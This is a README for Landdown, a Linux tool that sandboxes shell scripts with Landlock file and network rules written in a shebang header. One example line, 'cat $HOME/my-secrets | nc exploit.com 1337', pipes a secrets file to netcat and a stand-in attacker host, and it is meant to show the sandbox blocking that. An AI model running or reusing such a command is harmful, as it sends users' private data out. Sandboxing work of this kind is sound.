#Landdown - Simple shell script sandbox
Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with Landlock. Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example:
#!/usr/bin/env landdown ro /bin ro /lib #!/bin/sh # Following works echo "Hi" # Following fails cat $HOME/my-secrets | nc exploit.com 1337
Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist.
The syntax is:
#!/usr/bin/env landdown
<rules...>
#!<interpreter>
<script content...>
#Supported rules
rof <file>
rwf <file>
ro <dir>
rw <dir>
bind <port>
connect <port>
Each rule can be used zero or more times.
#Install
Generic install:
go install git.sr.ht/~marcc/landdown@latest
Arch Linux: aur
#Examples
#Access a file
#!/usr/bin/env landdown ro /bin ro /lib rwf /tmp/some-file.txt #!/bin/sh echo "Edit" > /tmp/some-file.txt
Try removing rwf /tmp/some-file.txt and the script should fail.
Note: the file need to exist in order for landdown to work, run touch /tmp/some-file.txt to test.
#Network access
#!/usr/bin/env landdown ro /bin ro /lib ro /etc/ssl rof /etc/resolv.conf connect 443 #!/bin/bash curl https://www.google.com
Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it should fail. Network access needs to be explicitly set.
#Patches & Contributions
Contributions are welcome. Please send them to my public inbox
#See also
- sh(1) - section on ulimit
- Good Practices
#Alternatives
- bubblewrap(1)
- firejail(1)
- landrun(1)
Landdown tries to be as friction-less and simple as possible, and specifically targets shell scripts rather than command line invocations.